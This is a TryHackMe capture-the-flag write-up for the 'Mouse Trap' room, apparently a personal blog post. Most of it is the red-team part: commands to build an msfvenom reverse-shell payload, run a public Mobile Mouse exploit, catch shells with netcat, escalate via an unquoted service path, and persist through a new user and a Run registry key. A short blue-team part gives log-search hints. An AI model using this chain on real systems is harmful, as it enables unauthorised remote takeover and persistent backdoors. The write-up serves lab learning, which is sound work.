TryHackMe | Mouse Trap

Firstly, I want to emphasize that this is a brief writeup, for those who want to get a hint and not the step-by-step solution, mostly centered on the red team part, mainly because the blue part is very easy, only needed to use the find tool in Timeline Explorer and some patience.

RED PART

INITIAL ACCESS

1. You may need to run Nmap for more info.
2. Exploit link: https://github.com/blue0x1/mobilemouse-exploit
3. shell.exe –> msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4446 -f exe -o shell.exe
4. Run exploit –> python CVE-2023-31902-v2.py --target IP --lhost IP --file shell.exe
5. Listen –> nc -lvnp 4446

Be aware that this may fail some times, but generally should work without problem. Also, --lhost is optional.

PRIVILEGE ESCALATION

1. Let’s run SharpUp:

   On target machine, in purpletom’s folder: .\SharpUp.exe audit

    SharpUp recon
    ---
    === SharpUp: Running Privilege Escalation Checks ===
    [!] Modifialbe scheduled tasks were not evaluated due to permissions.

    === Services with Unquoted Paths ===
            Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program' is modifable.
            Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files' is modifable.
            Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.

    [*] Completed Privesc Checks in 4 seconds
    ---

1. Reading this tutorial carefully, you should have a very good idea about what you should do, so read it! https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae
2. Create payload similar to one in INITIAL ACCESS part, but this time use another port and name it Mouse.exe. In the tutorial above, you’ll also see how to transfer it to the machine, but I’ll also show you briefly.
   • Get the smbserver.py code from here https://github.com/fortra/impacket/blob/master/examples/smbserver.py
   • On your machine, after you created the Mouse.exe payload, in that same folder run: python3 smbserver.py shared . We use, SMB protocol to transfer the payload to the target.
   • On target run, in Mobile Mouse folder, as indicated in task info: copy \\YOUR_MACHINE_IP\shared\Mouse.exe
3. Now, we should look to start the vulnerable service, but before we must listen for a shell:
   • Your machine: nc -lvnp PORT
   • Target Machine: sc start "Mobile Mouse Service"

You should now run whoami and make sure it outputs: NT AUTHORITY\SYSTEM. I had some problems here, described by the fact that I tried to query the service and it said it didn’t exist. I don’t know if I was just tired and didn’t use the commands properly because it was late at night or if it were really a bug, but every problem was solved by just restarting the machine. So, in case you think you did everything properly, but this doesn’t work, try a restart! :)

PERSISTANCE

Now, that you are the boss of this machine, you can easily run these commands to get persistance:

1. net user terry /add
2. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f

   I also added the shell.exe in the right directory, just to make sure when I verify with the script on the Administrator’s Desktop, everything works well.

Given you followed the steps here, you should’ve finished the Red Part. If you encountered any difficulties, keep calm and be happy, because this is how learning takes place.

BLUE PART

There aren’t a lot of things to say here. I personally used Timeline Explorer to solve this part. Follow the steps presented in task info and after that, go to the top-right corner of the app. There, you’ll find the “find” search box.

Using text such as: cmd.exe, .exe, powershell.exe, etc. I was able to find all the answers. So, I don’t think this will pose a hard challenge for you neither.

I used Timeline Explorer, because it seemed more easy to use for me than Sysmonview. I’m yet to use Sysmonview in other future scenarios.

There are only 2 questions for which I want to give some hints:

1. What is the full command-line of the tool used to enumerate the privilege escalation vectors?

   Think of what we used in Red Part to find the vulnerable service and search for that program.

2. What is the full command line value of the process created during the unquoted service path abuse?

   Think of the original executable associated with the Mobile Mouse Service, which we also exploited.

This is my writeup for this challenge. I want to thank the authors for giving me the opportunity to solve this great challnge. For my level of knowledge, this challenged posed some difficulty, but it was definitely an important stepping stone for achieving my purpose of solving more difficult challenges. It’s a great satisfaction to be able to solve challenges without writeups yet available, but indeed I read a lot of writeups to other challs to get to this point. :)

Thanks for reading!